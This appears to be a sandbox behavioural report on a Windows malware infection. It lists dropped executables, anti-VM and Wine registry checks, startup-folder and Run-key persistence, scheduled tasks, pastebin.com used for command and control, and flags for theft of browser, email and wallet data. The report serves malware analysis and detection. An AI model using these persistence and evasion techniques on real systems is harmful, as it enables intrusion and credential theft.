Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\iSoxSIyN\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_3508_133856896480926616\chromium.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
